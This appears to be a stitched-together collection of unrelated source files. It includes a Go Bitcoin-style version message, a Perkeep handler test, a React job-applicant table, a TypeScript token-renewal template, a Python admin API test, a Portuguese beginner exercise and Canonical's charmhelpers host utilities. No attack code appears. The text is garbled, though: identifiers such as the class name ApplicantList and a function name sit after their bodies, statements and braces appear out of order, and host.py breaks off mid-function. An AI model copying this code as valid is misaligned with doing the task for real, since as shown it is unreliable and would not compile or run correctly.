return &MsgVersion{ ProtocolVersion: int32(ProtocolVersion), Services: 0, Timestamp: time.Unix(time.Now().Unix(), 0), AddrYou: *you, AddrMe: *me, Nonce: nonce, UserAgent: DefaultUserAgent, LastBlock: lastBlock, DisableRelayTx: false, } } // validateUserAgent checks userAgent length against MaxUserAgentLen func validateUserAgent(userAgent string) error { if len(userAgent) > MaxUserAgentLen { str := fmt.Sprintf("user agent too long [len %v, max %v]", len(userAgent), MaxUserAgentLen) return messageError("MsgVersion", str) } return nil } // AddUserAgent adds a user agent to the user agent string for the version // message. The version string is not defined to any strict format, although // it is recommended to use the form "major.minor.revision" e.g. "2.6.41". func (msg *MsgVersion) AddUserAgent(name string, version string, comments ...string) error { newUserAgent := fmt.Sprintf("%s:%s", name, version) if len(comments) != 0 { newUserAgent = fmt.Sprintf("%s(%s)", newUserAgent, strings.Join(comments, "; ")) } newUserAgent = fmt.Sprintf("%s%s/", msg.UserAgent, newUserAgent) err := validateUserAgent(newUserAgent) if err != nil { return err }
}
msg.UserAgent = newUserAgent return nil
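A minimal sketch (not from this package) of how AddUserAgent composes the user agent string described in the comments above; the import path, node name, version, and nonce are placeholders, and zero-value NetAddress fields are used only to satisfy NewMsgVersion.

package main

import (
	"fmt"
	"log"

	"example.com/ppcd/wire" // placeholder import path for the wire package above
)

func main() {
	var me, you wire.NetAddress // zero values; real callers fill in peer addresses
	msg := wire.NewMsgVersion(&me, &you, 0x1234, 0)

	// UserAgent starts as DefaultUserAgent ("/ppcwire:0.5.0/"); AddUserAgent
	// appends "name:version(comment; comment)/" and re-checks MaxUserAgentLen.
	if err := msg.AddUserAgent("mynode", "1.2.3", "linux", "amd64"); err != nil {
		log.Fatal(err)
	}

	fmt.Println(msg.UserAgent) // "/ppcwire:0.5.0/mynode:1.2.3(linux; amd64)/"
}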
handler_test.go
/* Copyright 2014 The Perkeep Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package thumbnail import ( "io/ioutil" "net/http" "net/http/httptest" "testing" "perkeep.org/pkg/blob" "perkeep.org/pkg/schema" "perkeep.org/pkg/test" ) func TestHandlerWrongRef(t *testing.T) { storage := new(test.Fetcher) ref := blob.MustParse("sha1-f1d2d2f924e986ac86fdf7b36c94bcdf32beec15") wrongRefString := "sha1-e242ed3bffccdf271b7fbaf34ed72d089537b42f" ts := httptest.NewServer(createVideothumbnailHandler(ref, storage)) defer ts.Close() resp, err := http.Get(ts.URL + "/" + wrongRefString) if err != nil { t.Fatal(err) } if resp.StatusCode != 403 { t.Fatalf("excepted forbidden status when the wrong ref is requested") } } func TestHandlerRightRef(t *testing.T) { b := test.Blob{Contents: "Foo"} storage := new(test.Fetcher) ref, err := schema.WriteFileFromReader(storage, "", b.Reader()) if err != nil { t.Fatal(err) } if err != nil { t.Fatal(err) } ts := httptest.NewServer(createVideothumbnailHandler(ref, storage)) defer ts.Close() resp, err := http.Get(ts.URL + "/" + ref.String()) if err != nil { t.Fatal(err)
t.Fatalf("expected 200 status: %v", resp) } content, err := ioutil.ReadAll(resp.Body) if err != nil { t.Fatal(err) } if string(content) != b.Contents { t.Errorf("excepted handler to serve data") } }
} if resp.StatusCode != 200 {
applicantList.js
import React from 'react'; import { Table, Modal, Divider} from 'antd'; import { Link } from 'gatsby'; import { I18n } from 'aws-amplify'; import * as Util from '../../test/jobDescriptionUnitTest/jobDescriptionUtil'; const { Column } = Table; class
extends React.Component{ state = { applicants: this.props.applicants, visible: false, employeeName: "", currentAppliedJobId: "", status: "" } handleAccept = async (id, name, e) => { console.log('handle accept is click with this id: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }) const result = Util.updateJobStatus(currentId, "Accept"); console.log('this is the result: ', result); } handlePending = async (id, name, e) => { console.log('handle pending is click with this id in handle pending: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }); // update the employee's job status to pending const result = Util.updateJobStatus(currentId, "Pending"); console.log('this is the result: ', result); } handleReject = async (id, name, e) => { console.log('handle accept is click with this id: ', id); const currentId = id; const currentName = name; this.setState({ currentAppliedJobId: currentId, employeeName: currentName, visible: true }); // update the employee's job status to reject const result = Util.updateJobStatus(currentId, "Reject"); console.log('this is the result: ', result); } render(){ console.log('this is the applicants: ', this.state.applicants); console.log('this is the id: ', this.state.currentEmployeeId); return( <div> <Table dataSource={this.state.applicants}> <Column title={I18n.get('Name')} key="name" render = {(text, record) => ( <Link to={"/app/user-profile/"+record.key}> {record.name} </Link> )} /> <Column title={I18n.get("English Level")} dataIndex="englishLevel" key="englishLevel" /> <Column title={I18n.get("Address")} dataIndex="address" key="address" /> <Column style = {{marginTop: "15px"}} title={I18n.get("Status")} key={"status" + Math.random()} dataIndex = "status" /> <Column style = {{marginTop: "15px"}} title ={I18n.get("Decision")} render = {(text, record) => ( <span> <a onClick = {(e) => this.handleAccept(record.appliedJobId, record.name, e) }>Accpet</a> <Divider type="vertical" style={{background: "green"}}/> <a onClick = {(e) => this.handlePending(record.appliedJobId, record.name, e) }>Pending</a> <Divider type="vertical" style={{background: "green"}}/> <a onClick = {(e) => this.handleReject(record.appliedJobId, record.name, e) }>Reject</a> </span> )} /> </Table> <Modal visible={this.state.visible} onOk = {() => { this.setState({ visible: false }) window.location.reload(); }} > <p> Update {this.state.employeeName}'s status successfully </p> </Modal> </div> ) } } export default ApplicantList; {/* <Column title="Tags" dataIndex="tags" key="tags" render={tags => ( <span> {tags.map(tag => <Tag color="blue" key={tag}>{tag}</Tag>)} </span> )} /> <Column title="Action" key="action" render={(text, record) => ( <span> {/* we can send out an email here to inform the user for interview or reject */} // <a href="javascript:;">Invite {record.lastName}</a> // <Divider type="vertical" /> // <a href="javascript:;">Reject</a> // </span> // )} // /> {/* <span> <Button onClick={this.inviteHandler}>Invite for interview</Button> <Divider type="vertical" style={{background: "green"}}/> <Button onClick={this.rejectHandler}>Reject</Button> </span> */}
ApplicantList
main.js
import { StyleSheet } from 'react-native'; const styles = StyleSheet.create({ body: { display: 'flex', alignContent: 'center',
alignItems: 'center' }, exposure: { height: 200 } }) export default styles;
ProjectRegisteredNamedMethods.ts
export function renew<%= capitalizeCustomerSafeName %>AccessToken(): Promise<string> { let renewTokenPromise = new Promise<string>((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.open('POST', '/renewtoken'); xhr.onreadystatechange = handler; xhr.setRequestHeader('Accept', 'application/text'); xhr.send(); function
() { if (this.readyState === this.DONE) { if (this.status === 200) { resolve(this.response); } else { reject(new Error('renewtoken failed with status: [' + this.status + ']')); } } } }); return renewTokenPromise; }
handler
admin_test.py
# -*- coding: utf-8 -*- import unittest from mock import MagicMock, Mock, patch from tornado.gen import Future from .. import TestHandlerBase @unittest.skip("TODO") class AdminAPITest(TestHandlerBase):
def setUp(self): self.client_mock = MagicMock(name="client_mock") self.fake_context = MagicMock( __enter__=Mock(return_value=self.client_mock), __exit__=Mock(return_value=False), ) self.future_mock = Future() super(AdminAPITest, self).setUp() @patch("brew_view.handlers.v1.admin.thrift_context") def test_patch(self, context_mock): context_mock.return_value = self.fake_context self.client_mock.rescanSystemDirectory.return_value = self.future_mock self.future_mock.set_result(None) response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "rescan"}]}', headers={"content-type": "application/json"}, ) self.assertEqual(204, response.code) self.client_mock.rescanSystemDirectory.assert_called_once_with() @patch("brew_view.handlers.v1.admin.thrift_context") def test_patch_exception(self, context_mock): context_mock.return_value = self.fake_context self.client_mock.rescanSystemDirectory.return_value = self.future_mock self.future_mock.set_exception(ValueError()) response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "rescan"}]}', headers={"content-type": "application/json"}, ) self.assertGreaterEqual(response.code, 500) self.client_mock.rescanSystemDirectory.assert_called_once_with() def test_patch_bad_operation(self): response = self.fetch( "/api/v1/admin/", method="PATCH", body='{"operations": [{"operation": "fake"}]}', headers={"content-type": "application/json"}, ) self.assertGreaterEqual(response.code, 400) self.assertLess(response.code, 500)
math.go
package utils import ( "math" ) // GetUint32Diff returns the difference between newCount and oldCount
func GetUint32Diff(newCount uint32, oldCount uint32) uint32 { // Catch overflows if newCount < oldCount { return (math.MaxUint32 - oldCount) + newCount } return newCount - oldCount }
// and catches overflows
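A standalone sketch of the overflow branch documented above; the function is copied locally under a placeholder name so the example runs on its own.

package main

import (
	"fmt"
	"math"
)

// getUint32Diff is a local copy of utils.GetUint32Diff above, for illustration.
func getUint32Diff(newCount, oldCount uint32) uint32 {
	if newCount < oldCount {
		return (math.MaxUint32 - oldCount) + newCount
	}
	return newCount - oldCount
}

func main() {
	fmt.Println(getUint32Diff(250, 100))             // 150: plain difference
	fmt.Println(getUint32Diff(10, math.MaxUint32-5)) // 15: counter wrapped around zero
}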
ex059.py
from time import sleep valor1 = int(input('Digite Primeiro valor: ')) valor2 = int(input('Digite segundo valor: ')) opção = 0 while opção != 5: print(''' [ 1 ] SOMAR [ 2 ] MULTIPLICAR [ 3 ] MAIOR [ 4 ] NOVOS NÚMEROS [ 5 ] SAIR DO PROGRAMA''') opção = int(input('Qual opção você deseja ? ')) if opção == 1: total = valor1 + valor2 print('A soma entre {} + {} é igual a {}'.format(valor1, valor2, total)) elif opção == 2: produto = valor1 * valor2 print('Multiplicando {} x {} é igual a {}'.format(valor1, valor2, produto)) elif opção == 3: if valor1 > valor2: maior = valor1 else: maior = valor2
print('O Maior número entre {} e {} foi o {}'.format(valor1, valor2, maior)) elif opção == 4: print('Por favor Informe os número novamente: ') valor1 = int(input('Digite Primeiro valor: ')) valor2 = int(input('Digite segundo valor: ')) elif opção == 5: print('Finalizando.......') sleep(4) else: print('Opção Invalida! Tente Novamente!! ') print('=-=' * 10) sleep(2) print('Fim do Programa! Volte sempre!!!')
host.py
# Copyright 2014-2015 Canonical Limited. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tools for working with the host system""" # Copyright 2012 Canonical Ltd. # # Authors: # Nick Moffitt <[email protected]> # Matthew Wedgwood <[email protected]> import os import re import pwd import glob import grp import random import string import subprocess import hashlib import functools import itertools import six from contextlib import contextmanager from collections import OrderedDict from .hookenv import log, INFO, DEBUG, local_unit, charm_name from .fstab import Fstab from charmhelpers.osplatform import get_platform __platform__ = get_platform() if __platform__ == "ubuntu": from charmhelpers.core.host_factory.ubuntu import ( service_available, add_new_group, lsb_release, cmp_pkgrevno, CompareHostReleases, ) # flake8: noqa -- ignore F401 for this import elif __platform__ == "centos": from charmhelpers.core.host_factory.centos import ( service_available, add_new_group, lsb_release, cmp_pkgrevno, CompareHostReleases, ) # flake8: noqa -- ignore F401 for this import UPDATEDB_PATH = '/etc/updatedb.conf' def service_start(service_name, **kwargs): """Start a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. The follow- ing example stops the ceph-osd service for instance id=4: service_stop('ceph-osd', id=4) :param service_name: the name of the service to stop :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ return service('start', service_name, **kwargs) def service_stop(service_name, **kwargs): """Stop a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. 
The follow- ing example stops the ceph-osd service for instance id=4: service_stop('ceph-osd', id=4) :param service_name: the name of the service to stop :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ return service('stop', service_name, **kwargs) def service_restart(service_name, **kwargs): """Restart a system service. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be restarted. The follow- ing example restarts the ceph-osd service for instance id=4: service_restart('ceph-osd', id=4) :param service_name: the name of the service to restart :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for init systems not allowing additional parameters via the commandline (systemd). """ return service('restart', service_name) def service_reload(service_name, restart_on_failure=False, **kwargs): """Reload a system service, optionally falling back to restart if reload fails. The specified service name is managed via the system level init system. Some init systems (e.g. upstart) require that additional arguments be provided in order to directly control service instances whereas other init systems allow for addressing instances of a service directly by name (e.g. systemd). The kwargs allow for the additional parameters to be passed to underlying init systems for those systems which require/allow for them. For example, the ceph-osd upstart script requires the id parameter to be passed along in order to identify which running daemon should be reloaded. The follow- ing example restarts the ceph-osd service for instance id=4: service_reload('ceph-osd', id=4) :param service_name: the name of the service to reload :param restart_on_failure: boolean indicating whether to fallback to a restart if the reload fails. :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for init systems not allowing additional parameters via the commandline (systemd). """ service_result = service('reload', service_name, **kwargs) if not service_result and restart_on_failure: service_result = service('restart', service_name, **kwargs) return service_result def service_pause(service_name, init_dir="/etc/init", initd_dir="/etc/init.d", **kwargs): """Pause a system service. Stop it, and prevent it from starting again at boot. :param service_name: the name of the service to pause :param init_dir: path to the upstart init directory :param initd_dir: path to the sysv init directory :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. 
kwargs are ignored for init systems which do not support key=value arguments via the commandline. """ stopped = True if service_running(service_name, **kwargs): stopped = service_stop(service_name, **kwargs) upstart_file = os.path.join(init_dir, "{}.conf".format(service_name)) sysv_file = os.path.join(initd_dir, service_name) if init_is_systemd(): service('disable', service_name) service('mask', service_name) elif os.path.exists(upstart_file): override_path = os.path.join( init_dir, '{}.override'.format(service_name)) with open(override_path, 'w') as fh: fh.write("manual\n") elif os.path.exists(sysv_file): subprocess.check_call(["update-rc.d", service_name, "disable"]) else: raise ValueError( "Unable to detect {0} as SystemD, Upstart {1} or" " SysV {2}".format( service_name, upstart_file, sysv_file)) return stopped def service_resume(service_name, init_dir="/etc/init", initd_dir="/etc/init.d", **kwargs): """Resume a system service. Reenable starting again at boot. Start the service. :param service_name: the name of the service to resume :param init_dir: the path to the init dir :param initd dir: the path to the initd dir :param **kwargs: additional parameters to pass to the init system when managing services. These will be passed as key=value parameters to the init system's commandline. kwargs are ignored for systemd enabled systems. """ upstart_file = os.path.join(init_dir, "{}.conf".format(service_name)) sysv_file = os.path.join(initd_dir, service_name) if init_is_systemd(): service('unmask', service_name) service('enable', service_name) elif os.path.exists(upstart_file): override_path = os.path.join( init_dir, '{}.override'.format(service_name)) if os.path.exists(override_path): os.unlink(override_path) elif os.path.exists(sysv_file): subprocess.check_call(["update-rc.d", service_name, "enable"]) else: raise ValueError( "Unable to detect {0} as SystemD, Upstart {1} or" " SysV {2}".format( service_name, upstart_file, sysv_file)) started = service_running(service_name, **kwargs) if not started: started = service_start(service_name, **kwargs) return started def service(action, service_name, **kwargs): """Control a system service. :param action: the action to take on the service :param service_name: the name of the service to perform th action on :param **kwargs: additional params to be passed to the service command in the form of key=value. """ if init_is_systemd(): cmd = ['systemctl', action, service_name] else: cmd = ['service', service_name, action] for key, value in six.iteritems(kwargs): parameter = '%s=%s' % (key, value) cmd.append(parameter) return subprocess.call(cmd) == 0 _UPSTART_CONF = "/etc/init/{}.conf" _INIT_D_CONF = "/etc/init.d/{}" def service_running(service_name, **kwargs): """Determine whether a system service is running. :param service_name: the name of the service :param **kwargs: additional args to pass to the service command. This is used to pass additional key=value arguments to the service command line for managing specific instance units (e.g. service ceph-osd status id=2). The kwargs are ignored in systemd services. 
""" if init_is_systemd(): return service('is-active', service_name) else: if os.path.exists(_UPSTART_CONF.format(service_name)): try: cmd = ['status', service_name] for key, value in six.iteritems(kwargs): parameter = '%s=%s' % (key, value) cmd.append(parameter) output = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('UTF-8') except subprocess.CalledProcessError: return False else: # This works for upstart scripts where the 'service' command # returns a consistent string to represent running # 'start/running' if ("start/running" in output or "is running" in output or "up and running" in output): return True elif os.path.exists(_INIT_D_CONF.format(service_name)): # Check System V scripts init script return codes return service('status', service_name) return False SYSTEMD_SYSTEM = '/run/systemd/system' def init_is_systemd(): """Return True if the host system uses systemd, False otherwise.""" if lsb_release()['DISTRIB_CODENAME'] == 'trusty': return False return os.path.isdir(SYSTEMD_SYSTEM) def adduser(username, password=None, shell='/bin/bash', system_user=False, primary_group=None, secondary_groups=None, uid=None, home_dir=None): """Add a user to the system. Will log but otherwise succeed if the user already exists. :param str username: Username to create :param str password: Password for user; if ``None``, create a system user :param str shell: The default shell for the user :param bool system_user: Whether to create a login or system user :param str primary_group: Primary group for user; defaults to username :param list secondary_groups: Optional list of additional groups :param int uid: UID for user being created :param str home_dir: Home directory for user :returns: The password database entry struct, as returned by `pwd.getpwnam` """ try: user_info = pwd.getpwnam(username) log('user {0} already exists!'.format(username)) if uid: user_info = pwd.getpwuid(int(uid)) log('user with uid {0} already exists!'.format(uid)) except KeyError: log('creating user {0}'.format(username)) cmd = ['useradd'] if uid: cmd.extend(['--uid', str(uid)]) if home_dir: cmd.extend(['--home', str(home_dir)]) if system_user or password is None: cmd.append('--system') else: cmd.extend([ '--create-home', '--shell', shell, '--password', password, ]) if not primary_group: try: grp.getgrnam(username) primary_group = username # avoid "group exists" error except KeyError: pass if primary_group: cmd.extend(['-g', primary_group]) if secondary_groups: cmd.extend(['-G', ','.join(secondary_groups)]) cmd.append(username) subprocess.check_call(cmd) user_info = pwd.getpwnam(username) return user_info def user_exists(username): """Check if a user exists""" try: pwd.getpwnam(username) user_exists = True except KeyError: user_exists = False return user_exists def uid_exists(uid): """Check if a uid exists""" try: pwd.getpwuid(uid) uid_exists = True except KeyError: uid_exists = False return uid_exists def group_exists(groupname): """Check if a group exists""" try: grp.getgrnam(groupname) group_exists = True except KeyError: group_exists = False return group_exists def gid_exists(gid): """Check if a gid exists""" try: grp.getgrgid(gid) gid_exists = True except KeyError: gid_exists = False return gid_exists def add_group(group_name, system_group=False, gid=None): """Add a group to the system Will log but otherwise succeed if the group already exists. 
:param str group_name: group to create :param bool system_group: Create system group :param int gid: GID for user being created :returns: The password database entry struct, as returned by `grp.getgrnam` """ try: group_info = grp.getgrnam(group_name) log('group {0} already exists!'.format(group_name)) if gid: group_info = grp.getgrgid(gid) log('group with gid {0} already exists!'.format(gid)) except KeyError: log('creating group {0}'.format(group_name)) add_new_group(group_name, system_group, gid) group_info = grp.getgrnam(group_name) return group_info def add_user_to_group(username, group): """Add a user to a group""" cmd = ['gpasswd', '-a', username, group] log("Adding user {} to group {}".format(username, group)) subprocess.check_call(cmd) def chage(username, lastday=None, expiredate=None, inactive=None, mindays=None, maxdays=None, root=None, warndays=None): """Change user password expiry information :param str username: User to update :param str lastday: Set when password was changed in YYYY-MM-DD format :param str expiredate: Set when user's account will no longer be accessible in YYYY-MM-DD format. -1 will remove an account expiration date. :param str inactive: Set the number of days of inactivity after a password has expired before the account is locked. -1 will remove an account's inactivity. :param str mindays: Set the minimum number of days between password changes to MIN_DAYS. 0 indicates the password can be changed anytime. :param str maxdays: Set the maximum number of days during which a password is valid. -1 as MAX_DAYS will remove checking maxdays :param str root: Apply changes in the CHROOT_DIR directory :param str warndays: Set the number of days of warning before a password change is required :raises subprocess.CalledProcessError: if call to chage fails """ cmd = ['chage'] if root: cmd.extend(['--root', root]) if lastday: cmd.extend(['--lastday', lastday]) if expiredate: cmd.extend(['--expiredate', expiredate]) if inactive: cmd.extend(['--inactive', inactive]) if mindays: cmd.extend(['--mindays', mindays]) if maxdays: cmd.extend(['--maxdays', maxdays]) if warndays: cmd.extend(['--warndays', warndays]) cmd.append(username) subprocess.check_call(cmd) remove_password_expiry = functools.partial(chage, expiredate='-1', inactive='-1', mindays='0', maxdays='-1') def rsync(from_path, to_path, flags='-r', options=None, timeout=None): """Replicate the contents of a path""" options = options or ['--delete', '--executability'] cmd = ['/usr/bin/rsync', flags] if timeout: cmd = ['timeout', str(timeout)] + cmd cmd.extend(options) cmd.append(from_path) cmd.append(to_path) log(" ".join(cmd)) return subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('UTF-8').strip() def symlink(source, destination): """Create a symbolic link""" log("Symlinking {} as {}".format(source, destination)) cmd = [ 'ln', '-sf', source, destination, ] subprocess.check_call(cmd) def mkdir(path, owner='root', group='root', perms=0o555, force=False): """Create a directory""" log("Making dir {} {}:{} {:o}".format(path, owner, group, perms)) uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid realpath = os.path.abspath(path) path_exists = os.path.exists(realpath) if path_exists and force: if not os.path.isdir(realpath): log("Removing non-directory file {} prior to mkdir()".format(path)) os.unlink(realpath) os.makedirs(realpath, perms) elif not path_exists: os.makedirs(realpath, perms) os.chown(realpath, uid, gid) os.chmod(realpath, perms) def write_file(path, content, owner='root', group='root', 
perms=0o444): """Create or overwrite a file with the contents of a byte string.""" uid = pwd.getpwnam(owner).pw_uid gid = grp.getgrnam(group).gr_gid # lets see if we can grab the file and compare the context, to avoid doing # a write. existing_content = None existing_uid, existing_gid, existing_perms = None, None, None try: with open(path, 'rb') as target: existing_content = target.read() stat = os.stat(path) existing_uid, existing_gid, existing_perms = ( stat.st_uid, stat.st_gid, stat.st_mode ) except: pass if content != existing_content: log("Writing file {} {}:{} {:o}".format(path, owner, group, perms), level=DEBUG) with open(path, 'wb') as target: os.fchown(target.fileno(), uid, gid) os.fchmod(target.fileno(), perms) if six.PY3 and isinstance(content, six.string_types): content = content.encode('UTF-8') target.write(content) return # the contents were the same, but we might still need to change the # ownership or permissions. if existing_uid != uid: log("Changing uid on already existing content: {} -> {}" .format(existing_uid, uid), level=DEBUG) os.chown(path, uid, -1) if existing_gid != gid: log("Changing gid on already existing content: {} -> {}" .format(existing_gid, gid), level=DEBUG) os.chown(path, -1, gid) if existing_perms != perms: log("Changing permissions on existing content: {} -> {}" .format(existing_perms, perms), level=DEBUG) os.chown(path, perms) def fstab_remove(mp): """Remove the given mountpoint entry from /etc/fstab""" return Fstab.remove_by_mountpoint(mp) def fstab_add(dev, mp, fs, options=None): """Adds the given device entry to the /etc/fstab file""" return Fstab.add(dev, mp, fs, options=options) def mount(device, mountpoint, options=None, persist=False, filesystem="ext3"): """Mount a filesystem at a particular mountpoint""" cmd_args = ['mount'] if options is not None: cmd_args.extend(['-o', options]) cmd_args.extend([device, mountpoint]) try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error mounting {} at {}\n{}'.format(device, mountpoint, e.output)) return False if persist: return fstab_add(device, mountpoint, filesystem, options=options) return True def umount(mountpoint, persist=False): """Unmount a filesystem""" cmd_args = ['umount', mountpoint] try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error unmounting {}\n{}'.format(mountpoint, e.output)) return False if persist: return fstab_remove(mountpoint) return True def mounts(): """Get a list of all mounted volumes as [[mountpoint,device],[...]]""" with open('/proc/mounts') as f: # [['/mount/point','/dev/path'],[...]] system_mounts = [m[1::-1] for m in [l.strip().split() for l in f.readlines()]] return system_mounts def fstab_mount(mountpoint): """Mount filesystem using fstab""" cmd_args = ['mount', mountpoint] try: subprocess.check_output(cmd_args) except subprocess.CalledProcessError as e: log('Error unmounting {}\n{}'.format(mountpoint, e.output)) return False return True def file_hash(path, hash_type='md5'): """Generate a hash checksum of the contents of 'path' or None if not found. :param str hash_type: Any hash alrgorithm supported by :mod:`hashlib`, such as md5, sha1, sha256, sha512, etc. """ if os.path.exists(path): h = getattr(hashlib, hash_type)() with open(path, 'rb') as source: h.update(source.read()) return h.hexdigest() else: return None def path_hash(path): """Generate a hash checksum of all files matching 'path'. Standard wildcards like '*' and '?' 
are supported, see documentation for the 'glob' module for more information. :return: dict: A { filename: hash } dictionary for all matched files. Empty if none found. """ return { filename: file_hash(filename) for filename in glob.iglob(path) } def check_hash(path, checksum, hash_type='md5'): """Validate a file using a cryptographic checksum. :param str checksum: Value of the checksum used to validate the file. :param str hash_type: Hash algorithm used to generate `checksum`. Can be any hash alrgorithm supported by :mod:`hashlib`, such as md5, sha1, sha256, sha512, etc. :raises ChecksumError: If the file fails the checksum """ actual_checksum = file_hash(path, hash_type) if checksum != actual_checksum: raise ChecksumError("'%s' != '%s'" % (checksum, actual_checksum)) class ChecksumError(ValueError): """A class derived from Value error to indicate the checksum failed.""" pass def restart_on_change(restart_map, stopstart=False, restart_functions=None): """Restart services based on configuration files changing This function is used a decorator, for example:: @restart_on_change({ '/etc/ceph/ceph.conf': [ 'cinder-api', 'cinder-volume' ] '/etc/apache/sites-enabled/*': [ 'apache2' ] }) def config_changed(): pass # your code here In this example, the cinder-api and cinder-volume services would be restarted if /etc/ceph/ceph.conf is changed by the ceph_client_changed function. The apache2 service would be restarted if any file matching the pattern got changed, created or removed. Standard wildcards are supported, see documentation for the 'glob' module for more information. @param restart_map: {path_file_name: [service_name, ...] @param stopstart: DEFAULT false; whether to stop, start OR restart @param restart_functions: nonstandard functions to use to restart services {svc: func, ...} @returns result from decorated function """ def wrap(f): @functools.wraps(f) def wrapped_f(*args, **kwargs): return restart_on_change_helper( (lambda: f(*args, **kwargs)), restart_map, stopstart, restart_functions) return wrapped_f return wrap def restart_on_change_helper(lambda_f, restart_map, stopstart=False, restart_functions=None): """Helper function to perform the restart_on_change function. This is provided for decorators to restart services if files described in the restart_map have changed after an invocation of lambda_f(). @param lambda_f: function to call. @param restart_map: {file: [service, ...]} @param stopstart: whether to stop, start or restart a service @param restart_functions: nonstandard functions to use to restart services {svc: func, ...} @returns result of lambda_f() """ if restart_functions is None: restart_functions = {} checksums = {path: path_hash(path) for path in restart_map} r = lambda_f() # create a list of lists of the services to restart restarts = [restart_map[path] for path in restart_map if path_hash(path) != checksums[path]] # create a flat list of ordered services without duplicates from lists services_list = list(OrderedDict.fromkeys(itertools.chain(*restarts))) if services_list: actions = ('stop', 'start') if stopstart else ('restart',) for service_name in services_list: if service_name in restart_functions: restart_functions[service_name](service_name) else: for action in actions: service(action, service_name) return r def pwgen(length=None):
def is_phy_iface(interface): """Returns True if interface is not virtual, otherwise False.""" if interface: sys_net = '/sys/class/net' if os.path.isdir(sys_net): for iface in glob.glob(os.path.join(sys_net, '*')): if '/virtual/' in os.path.realpath(iface): continue if interface == os.path.basename(iface): return True return False def get_bond_master(interface): """Returns bond master if interface is bond slave otherwise None. NOTE: the provided interface is expected to be physical """ if interface: iface_path = '/sys/class/net/%s' % (interface) if os.path.exists(iface_path): if '/virtual/' in os.path.realpath(iface_path): return None master = os.path.join(iface_path, 'master') if os.path.exists(master): master = os.path.realpath(master) # make sure it is a bond master if os.path.exists(os.path.join(master, 'bonding')): return os.path.basename(master) return None def list_nics(nic_type=None): """Return a list of nics of given type(s)""" if isinstance(nic_type, six.string_types): int_types = [nic_type] else: int_types = nic_type interfaces = [] if nic_type: for int_type in int_types: cmd = ['ip', 'addr', 'show', 'label', int_type + '*'] ip_output = subprocess.check_output(cmd).decode('UTF-8') ip_output = ip_output.split('\n') ip_output = (line for line in ip_output if line) for line in ip_output: if line.split()[1].startswith(int_type): matched = re.search('.*: (' + int_type + r'[0-9]+\.[0-9]+)@.*', line) if matched: iface = matched.groups()[0] else: iface = line.split()[1].replace(":", "") if iface not in interfaces: interfaces.append(iface) else: cmd = ['ip', 'a'] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') ip_output = (line.strip() for line in ip_output if line) key = re.compile('^[0-9]+:\s+(.+):') for line in ip_output: matched = re.search(key, line) if matched: iface = matched.group(1) iface = iface.partition("@")[0] if iface not in interfaces: interfaces.append(iface) return interfaces def set_nic_mtu(nic, mtu): """Set the Maximum Transmission Unit (MTU) on a network interface.""" cmd = ['ip', 'link', 'set', nic, 'mtu', mtu] subprocess.check_call(cmd) def get_nic_mtu(nic): """Return the Maximum Transmission Unit (MTU) for a network interface.""" cmd = ['ip', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8').split('\n') mtu = "" for line in ip_output: words = line.split() if 'mtu' in words: mtu = words[words.index("mtu") + 1] return mtu def get_nic_hwaddr(nic): """Return the Media Access Control (MAC) for a network interface.""" cmd = ['ip', '-o', '-0', 'addr', 'show', nic] ip_output = subprocess.check_output(cmd).decode('UTF-8') hwaddr = "" words = ip_output.split() if 'link/ether' in words: hwaddr = words[words.index('link/ether') + 1] return hwaddr @contextmanager def chdir(directory): """Change the current working directory to a different directory for a code block and return the previous directory after the block exits. Useful to run commands from a specificed directory. :param str directory: The directory path to change to for this context. """ cur = os.getcwd() try: yield os.chdir(directory) finally: os.chdir(cur) def chownr(path, owner, group, follow_links=True, chowntopdir=False): """Recursively change user 